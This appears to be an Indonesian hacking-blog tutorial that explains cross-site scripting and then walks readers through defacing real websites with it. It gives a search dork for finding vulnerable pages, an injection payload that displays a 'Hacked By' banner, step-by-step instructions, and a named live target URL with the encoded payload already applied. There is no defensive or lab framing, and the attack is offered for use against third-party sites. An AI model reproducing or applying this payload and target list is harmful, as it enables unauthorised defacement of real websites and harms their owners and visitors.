Deface XSS Vulnerability

Hae, bertemu lagi dengan testa di Oc-Tech7. Kali ini testa akan share tutor deface poc XSS Vulnerability. Sebelumnya testa akan menjelaskan apa itu XSS. XSS merupakan kependekan yang digunakan untuk istilah Cross Site Scripting. XSS merupakan salah satu jenis serangan injeksi code. XSS dilakukan oleh penyerang dengan cara memasukkan kode HTML atau client script code lainnya ke suatu situs.

Okey langsung sadja

1. Bahan :

1. Internet
2. HP/PC

2. Dork :

1. inurl:"/showcatrows.php?CategoryID=

3. Exploit :

1. "><marquee><h1>Hacked By nick kamu ( Nama team kaamu )</h1></marquee>

4. Langkah-langkahnya

• Pertama, Dorking  dulu menggunakan dork diatas.
• Kedua, Pilih salah satu web.
• Ketiga, Maksukan  Exploit  diatas dibelang pathnya.

contoh  :
Sebelum :

• http://www.paypalshop.org/showcatrows.php?CategoryID=5"

Sesudah :

• http://www.paypalshop.org/showcatrows.php?CategoryID=5%22%3E%3Cmarquee%3E%3Ch1%3EHacked%20By%20N-Kun7%20(%20Oc-Tech7%20)%3C/h1%3E%3C/marquee%3E

Kalo berhasil akan muncul seperti ini

5. Live terget :

1. http://www.paypalshop.org/showcatrows.php?CategoryID=5"

6. Tutorial video :

Okey Sekian dulu :V

Kalo ada yang tidak dimengerti comment saja :*

Author : Oc-Tech7